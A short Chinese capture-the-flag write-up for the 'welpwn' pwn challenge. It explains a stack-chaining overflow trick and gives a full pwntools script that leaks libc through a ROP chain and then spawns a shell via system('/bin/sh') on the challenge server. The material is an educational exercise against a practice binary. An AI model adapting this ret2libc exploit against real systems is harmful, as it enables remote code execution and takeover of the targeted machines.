[攻防世界 pwn]——welpwn
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
我只能说这道题太巧了, 实在太巧了。我想出来一个名词叫做栈连接
还是先checksec一下
然后在IDA中看看, buf无法溢出, s因为有循环判断限定,只能溢出一个地址。
巧就巧在下面
0x20 = 32
这样我们就可以输入0x20个字符,也就是四个八个字节,四个pop掉就可以。
aaaaaaaa <--- s
aaaaaaaa
aaaaaaaa <--- echo ebp
pop_4_addr <--- echo ret
aaaaaaaa <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
write_got
main_addr
执行后变为, buf的前四个 八个字节都被pop掉了
pop_rdi_addr <--- ret
write_got
main_addr
同理,将栈这样构造。就可以获得shell了
aaaaaaaa <--- s
aaaaaaaa
aaaaaaaa <--- echo ebp
pop_4_addr <--- echo ret
aaaaaaaa <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
bin_sh_addr
system_addr
exploit
from pwn import *
from LibcSearcher import *
#p = process("./pwn")
p = remote("111.200.241.244",49039)
elf = ELF('./pwn')
#gdb.attach(p, "b *0x0400782")
write_got = elf.got['write']
puts_plt = elf.plt['puts']
pop_4 = 0x40089C
pop_rdi = 0x4008A3
p.recvuntil('Welcome to RCTF\n')
main_addr = 0x4007CD
payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)
p.send(payload)
p.recvuntil('\x40')
write_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
p.recvuntil('\n')
payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.send(payload)
p.interactive()